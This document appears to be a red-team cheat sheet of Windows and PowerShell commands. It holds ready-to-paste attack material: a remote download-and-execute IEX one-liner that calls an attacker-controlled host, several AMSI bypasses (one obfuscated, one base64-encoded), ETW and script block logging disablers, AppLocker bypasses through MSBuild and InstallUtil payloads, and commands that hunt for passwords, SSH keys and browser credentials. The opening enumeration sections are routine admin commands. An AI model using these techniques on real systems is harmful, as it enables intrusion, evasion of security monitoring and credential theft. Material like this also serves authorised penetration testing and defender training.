6.1.Windows-command.md

Windows Command

Table of Contents

• User Enumeration
• System Information
• Network Enumeration
• Process and Service Enumeration
• Share Enumeration
• Remote Command Execution
• PowerShell Remoting Cmdlets
• Defense Evasion
  • AMSI Bypass
  • ETW Bypass
  • Script Block Logging Bypass
  • AppLocker Bypass
• File Hunting

---

User Enumeration

Quick Check (One-liner)

# Quick Windows enumeration
whoami /all && net user && net localgroup administrators && systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

• List local users

  Get-LocalUser

• List domain users

  Get-ADUser -Filter *

• Get current user

  whoami
  $env:USERNAME

• Get user groups

  whoami /groups
  Get-LocalGroup
  Get-ADGroupMember "Domain Admins"

---

System Information

systeminfo
Get-ComputerInfo

• OS version

  [System.Environment]::OSVersion
  Get-WmiObject Win32_OperatingSystem

• Architecture

  [System.Environment]::Is64BitOperatingSystem
  $env:PROCESSOR_ARCHITECTURE

• Hostname

  hostname
  $env:COMPUTERNAME

• Domain information

  Get-WmiObject Win32_ComputerSystem | Select Domain

---

Network Enumeration

• Network interfaces

  ipconfig /all
  Get-NetIPAddress
  Get-NetIPConfiguration

• Routing table

  route print
  Get-NetRoute

• ARP table

  arp -a
  Get-NetNeighbor

• Active connections

  netstat -ano
  Get-NetTCPConnection

• DNS cache

  ipconfig /displaydns
  Get-DnsClientCache

---

Process and Service Enumeration

• List running processes

  Get-Process
  tasklist /v

• Enumerate Windows services

  Get-Service
  sc query

• List scheduled tasks

  Get-ScheduledTask
  schtasks /query /fo LIST /v

• List startup programs

  Get-CimInstance Win32_StartupCommand
  wmic startup get caption,command

---

Share Enumeration

• List shares

  net share
  Get-SmbShare
  Get-WmiObject Win32_Share

• Access shares

  net use \\target\share
  Get-SmbMapping

• Find accessible shares on network

  Get-SmbShare -CimSession (Get-ADComputer -Filter *).Name

---

Remote Command Execution

• Basic command execution

  Invoke-Command -ComputerName $rhost -ScriptBlock { whoami }

• Multiple commands

  Invoke-Command -ComputerName $rhost -ScriptBlock { whoami hostname ipconfig }

• Execute local script on remote

  Invoke-Command -ComputerName $rhost -FilePath .\script.ps1

• Download and execute

  Invoke-Command -ComputerName $rhost -ScriptBlock {IEX(New-Object Net.WebClient).DownloadString("http://$lhost/script.ps1")}

---

PowerShell Remoting Cmdlets

• Interactive Remote Session

  Enter-PSSession -ComputerName $rhost

• Exit Remote Session

  Exit-PSSession

• Run Command Remotely

  Invoke-Command -ComputerName $rhost -ScriptBlock {cmd}

• Create persistent session

  $s = New-PSSession -ComputerName $rhost

• Close session

  Remove-PSSession -Session $s

• List active sessions

  Get-PSSession

---

Defense Evasion

AMSI Bypass

Bypass Antimalware Scan Interface to run malicious PowerShell

Memory Patching (One-liner)

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Obfuscated Version

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf=@(0);[System.Runtime.InteropServices.Marshal]::Copy($buf,0,$ptr,1)

Matt Graeber's Method

$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)

Base64 Encoded One-liner

powershell -ep bypass -e WwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbGBsACwAJAB0AHIAdQBlACkA

Using Invisi-Shell

# Run PowerShell without logging or AMSI
.\RunWithPathAsAdmin.bat
.\RunWithRegistryNonAdmin.bat

---

ETW Bypass

Disable Event Tracing for Windows

[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)

---

Script Block Logging Bypass

$settings = [Ref].Assembly.GetType("System.Management.Automation.Utils").GetField("cachedGroupPolicySettings","NonPublic,Static").GetValue($null);
$settings["HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"] = @{}
$settings["HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"].Add("EnableScriptBlockLogging", "0")

---

AppLocker Bypass

Common Bypass Directories

# Default writable locations
C:\Windows\Tasks
C:\Windows\Temp
C:\Windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks
C:\Windows\SysWOW64\com\dmp

Execute from Bypass Locations

copy payload.exe C:\Windows\Tasks\
C:\Windows\Tasks\payload.exe

MSBuild Bypass

# Create .csproj file with embedded payload
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe payload.csproj

InstallUtil Bypass

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe

---

File Hunting

Search for sensitive files on Windows systems

Search for Passwords

:: Search in current directory recursively
findstr /si password *.txt *.xml *.ini *.config *.cfg

:: Search in specific paths
findstr /spin "password" C:\Users\*.* 2>nul
findstr /spin "password" C:\inetpub\*.* 2>nul

:: Case-insensitive search for multiple terms
findstr /si /c:"password" /c:"passwd" /c:"pwd" /c:"secret" *.* 2>nul

PowerShell File Search

# Search for files containing passwords
Get-ChildItem -Path C:\Users -Include *.txt,*.ini,*.config,*.xml -Recurse -ErrorAction SilentlyContinue | 
  Select-String -Pattern "password|passwd|pwd|secret" | Select-Object Path,LineNumber,Line

# Find specific file types
Get-ChildItem -Path C:\ -Include *.kdbx,*.pfx,*.p12,*.ppk,*.pem -Recurse -ErrorAction SilentlyContinue

# Find files modified recently
Get-ChildItem -Path C:\Users -Recurse -ErrorAction SilentlyContinue | 
  Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-7)}

Common Sensitive Files

:: Find config files
dir /s /b *.config *.ini *.xml *.txt 2>nul | findstr /i "password web.config app.config"

:: Find credential files
dir /s /b C:\Users\*password* C:\Users\*cred* C:\Users\*secret* 2>nul

:: Find SSH keys
dir /s /b C:\Users\*.ppk C:\Users\id_rsa C:\Users\.ssh 2>nul

:: Find browser credentials
dir /s /b "%APPDATA%\Microsoft\Credentials\*" 2>nul
dir /s /b "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" 2>nul

Registry Credential Search

:: Search registry for passwords
reg query HKLM /f password /t REG_SZ /s 2>nul
reg query HKCU /f password /t REG_SZ /s 2>nul

:: Common credential locations
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 2>nul
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s 2>nul

---

See Also

• Linux Command - Linux system commands
• Reverse Shell - Shell payloads for Windows and Linux
• Windows Privilege Escalation - Windows privesc techniques
• AD Exploitation - Active Directory attacks